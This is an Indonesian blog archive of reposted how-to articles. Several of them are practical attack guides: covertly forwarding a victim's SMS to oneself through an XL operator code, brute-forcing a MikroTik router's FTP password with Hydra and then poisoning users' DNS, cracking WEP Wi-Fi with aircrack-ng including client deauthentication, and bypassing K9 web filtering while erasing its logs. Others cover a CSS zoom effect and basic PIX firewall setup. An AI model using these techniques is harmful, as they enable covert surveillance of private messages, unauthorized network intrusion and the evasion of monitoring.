3 Okt 2013

Cara Sadap/Hack SMS Menggunakan Operator XL

hack hp, hack sms, hacking, cara hack sms
Setelah sebelum nya Info PC posting artikel tentang Cara Hack Handphone menggunakan aplikasi, maka kali ini Info PC akan menulis tentang Cara Hack SMS atau lebih tepatnya Cara Sadap/Hack SMS Menggunakan Operator dari HP orang lain tanpa sepengetahuan si korban.
Bagaimana cara nya??
Untuk cara kali ini kita memerlukan bantuan dari salah satu operator seluler yang ada di indonesia, yaitu Operator XL dengan tarif Rp. 1.000,-/bulan.
Oke, langsung saja ikuti caranya.
Simak!!
  1. Pertama-tama kamu harus pinjam hp korban (jika tidak di kasih rayu saja pake Magnum).
  2. Kemudian kamu ketik kode berikut dari Hp nya *123*571# kemudian Call.
  3. Setelah keluar menu nya, kamu pilih menu nomor 1 yaitu Auto Copy
  4. Kemudian kamu kirim SMS dari HP korban dengan Format COPY ON kemudian kirim ke nomor Handphone kamu, dan proses penyadapan pun berhasil.
  5. Silakan menikmati setiap SMS dari orang-orang yang kirim pesan kepada korban.
source :
http://infopc-yogi.blogspot.com/2012/10/cara-hack-sms-handphone-orang-lain.html

20 Sep 2013

Hacking Mikrotik Password dengan Inti kelemahan

are
http://blog.xcode.or.id/wp-content/uploads/2011/11/hackmikrotik.jpgTidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.
Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata bisa. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi? :)
Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.
Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik
C:\Documents and Settings\serverdata>nmap -A 192.168.1.174
Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time
Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        MikroTik router ftpd 3.20
22/tcp   open  ssh        OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp   open  telnet     Linux telnetd
80/tcp   open  http       MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open  winbox     MikroTik WinBox management console
8080/tcp open  http-proxy Mikrotik http proxy
8291/tcp open  unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
HOP RTT     ADDRESS
1   0.13 ms 192.168.1.174
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
Ternyata banyak port dan service yang terbuka di mikrotik. :D
Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.
C:\Documents and Settings\serverdata>

Anda bisa menggunakan tool Hydra GUI buatan Yogyafree disini
C:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174   login: admin   password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Saat login dan exploitasi yang dapat dilakukan.
Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router. :D
Ingin dapat bandwidth full ? :D
Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.

Oke, sekian dulu, cayooo.
Oleh Kurniawan – yk_family_code@yahoo.com
 sumber:
http://blog.xcode.or.id/?p=661

17 Sep 2013

Hack Wifi dengan Aircrack

http://www.mmbarabba.it/kwuppi/wp-content/uploads/2009/09/schermata-aircrack.png 
Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card
$ sudo airmon-ng stop ath0
kemudian masukkan
$ iwconfig
Sistem harus merespon sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏
Step 2 : Start wireless card
$ airmon-ng start wifi0
“9″ adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet
respon sistem harus sebagai berikut:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏
kemudian masukkan
$ iwconfig
dan pastikan bahwa resppon sistem sebagai berikut
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step 3 : Jalankan airodump-ng
airodump-ng digunakan untuk mengcapture paket dari akses point
$ sudo airodump-ng –channel X –write prefix_for_capture_file interface
misal
$ sudo airodump-ng –channel 3 –write tes ath0
“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.
untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas
$ airodump-ng –write tes ath0
Step 4 : Deauthenticate Clients(optional)
tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.
$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang
misal
$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
* -a BSSID/Mac address akses point
* -c MAC Address client
* 15 jumlah paket yang dikirim
Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.
$ sudo aircrack-ptw tes-01.cap
atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng
$ sudo aircrack-ng -z tes-01.cap -b mac_ssid
misal
$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx
contoh output :
i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.
Aircrack-ng 1.0 beta1
[00:00:00] Tested 81 keys (got 21872 IVs)
KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)
KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU
Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0″ tetapi
$ sudo airmon-ng start wlan0
untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU
pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1″ tetapi
$ airmon-ng start eth1
Selamat mencoba
Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”
Sumber : https://www.facebook.com/notes/kumpulan-teknik-informatika-univ-serambi-mekkah/aircrack-ng/193159214070190?ref=nf

Cara Mengganti Nama Facebook Terbaru


saya mau tanya nie,pernah gak kalian punya keinginan untuk mengganti nama Facebook kalian yang sudah lama di pakai ?
pastinya BOSEN kan pakai nama yang itu" melulu ?
nah saya akan kasih cara agar bisa ganti Nama Facebook lagi :)

caranya cukup mudah kok :)
Kalian haris ke Alamat yang ada  DISINI atau mau Klik yang DISINI


us kalian isi semua kolomnya dan upload Foto Asli Kalian yang pernah jadi foto profil
liat gambar di bawah :



sumber :
http://bandung-cyber4rt.blogspot.com/2012/07/cara-mengganti-nama-facebook-terbaru.html

Cara Menembus Proteksi Web

Saat ini banyak perusahaan, sekolahan, kampus maupun instansi lain yang meggunakan software K9 Web Protection untuk memfilter koneksi internetnya, ya tujuannya satu biar produktivitas kerja mereka meningkat, tapi tenang aja Jika anda adalah golongan orang seperti itu dan perusahaan atau tempat anda beraktifitas memfilter website-website yang menjadi sumber inspirasi anda.anda dapat menggunakan software berikut untuk mem-bypass Proteksi K9 Web versi 3 hingga 4.0.288.
Nah Untuk Softwarenya Bisa di download Disini
bypass web filter picture
Nah langkah selanjutnya extrax file tsb dengan winRaR ==>> Install.
dan ikuti langkah- langkah berikut :
  1. Tutup semua browser yang terbuka. (PENTING, agar aplikasi ini bisa memanipulasi LOG)
  2. Jalankan Bypass K9 Web Protection v1.2 lalu klik saja ”Unblock All Website”, akan keluar pesan pemberitahuan bahwa semua web yang di blokir bisa diakses kembali dengan normal. Bypass K9 Web Protection v1.2 bisa Anda tutup sekarang.
  3. Browsing Sepuasnya tanpa dibatasi oleh filter K9. trus klo uda puas browsing.
  4. Tutup semua browser yang terbuka (sama dengan langkah pertama)
  5. Jalankan Bypass K9 Web Protection v1.2 lalu klik ”Restore Admin. Settings”, akan keluar pesan pemberitahuan bahwa kini Administrator setting sudah dikembalikan dalam keadaan seperti sedia kala, termasuk LOG pada K9 WP tentang situs-situs yang Anda buka juga sudah dihapus.
(Untuk dapat menggunakan software ini, pastikan anda masuk sebagai administrator window yang anda gunakan, bukan sebagai guest atau user lain yang hak aksesnya dibawah administrator)

sumber:
http://kapanmaju.blogspot.com/2010/01/di-kantor-online-pakai-proxy-walau.html

14 Sep 2013

Cara Membuat Efek Zoom Pada Gambar Di Blog




  • Login ke akun blogger sobat.
  • Pilih Template
  • Untuk berjaga jaga downlod dulu tamplate blog sobat ( Backup )
  • Pilih Edit HTML >> Lanjutkan >> Kasih centang "Expand Template Widget".
  • Cari kode ]]></b:skin> untuk mempermudah gunakan F3 atau Ctrl F.
  • Letakan kode di bawah ini tepat di atas kode ]]></b:skin>

.post img:hover {
-o-transition: all 0.3s;
-moz-transition: all 0.3s;
-webkit-transition: all 0.3s;
-moz-transform: scale(1.3);
-o-transform: scale(1.3);
-webkit-transform: scale(1.3); }


  • Simpan dan lihat hasilnya.
sumber:
http://luhurfatah10.blogspot.com/2012/11/cara-membuat-efek-zoom-pada-gambar-di.html

konfigurasi firewall pada jaringan

Konfigurasi Basic (dasar)

Sebenarnya ada banyak cara untuk mengakses konfigurasi firewall, bisa menggunakan Pix Device Manager (PDM), ataupun hanya menggunakan comand prompt. Kita pilih yang menggunakan comand prompt, karena kita ingin belajar bagaimana mengkonfigurasi sendiri dan tidak melalui interface (alasan, padahal karena saya tidak pernah menggunakan PDM, hehe).
Didalam kotak pembelian Pix Firewall tersebut ada kabel serial dan sambungkan ke PC. Lalu buka comand prompt, dan lakukan telnet ke IP Firewall anda (default IP biasanya 192.168.1.1)
telnet 192.168.1.1
setelah itu akan keluar prompt untuk mengisikan password, isikan dengan ‘cisco’ (default passwordnya). Setelah itu, anda harus masuk ke kondisi enable (en).

Nah, sekarang kita telah berada di mod administratif. Setelah itu mari kita melakukan basic konfigurasi, yang terdiri dari:
1.     Kita set hostname dari firewall
2.     Kita ubah password untuk firewall dan fungsi enable
3.     Kita konfigurasi IP pada interface
4.     Membuat rute default
1. Set hostname
2. Kita tukar password untuk login
Kita tukar password enable, untuk ke mod administratif
3. Kita konfigurasi IP address outside dan inside dari firewall ini
62.6.63.178 akan menjadi IP dari firewall untuk koneksi ke luar, dan 192.168.3.1 akan menjadi IP untuk komunikasi secara internal dengan device-device lain dalam jaringan kita.
4. Kemudian kita buat default route, sehingga semua komunikasi ke firewall akan diteruskan ke router (kita anggap router kita mempunyai IP 62.6.63.177)
Network Address Translation (NAT)
Ok, konfigurasi secara basic telah kita lakukan, sekarang kita ke konfigurasi yang lebih lanjut sedikit (little bit advance, hehe) . Yaitu Network address translation
Peraturan Firewall
Peraturan firewall (firewall rules) mempunyai maksud untuk memberikan izin devices dari dalam ataupun luar untuk mengakses ke luar atau ke dalam (hehehe bingung saya, network in-out / network out-in begitu kurang lebih).
Jadi dengan command di atas, maka akses ke internet (www) adalah boleh, demikian juga mail server (IP 62.6.63.180) dapat menerima dan menghantar email. * ada pesan dari orang katanya jangan pakai conduit, karena itu konfigurasi yang lama (lemah), lebih baik pakai access list (ketika server kami kena serang, dan dia diberikan konfigurasinya)
Terakhir kita show dan save
untuk melihat semua konfigurasi yang telah kita buat
Untuk save konfigurasi dalam flash memory, kalau tidak maka akan hilang ketika firewall mati (restart)
Catatan : Semua IP diatas adalah fiktif, jangan mencoba-coba untuk mengakses. Konfigurasi penuh Firewall kami sendiri pada waktu itu mencapai 3 lembar kertas A4 (kalau diprint), yang disini hanyalah dasar.
PIX#exit
*Selesai*

sumber:
http://rumah-it01.blogspot.com/2013/05/konfigurasi-firewall.html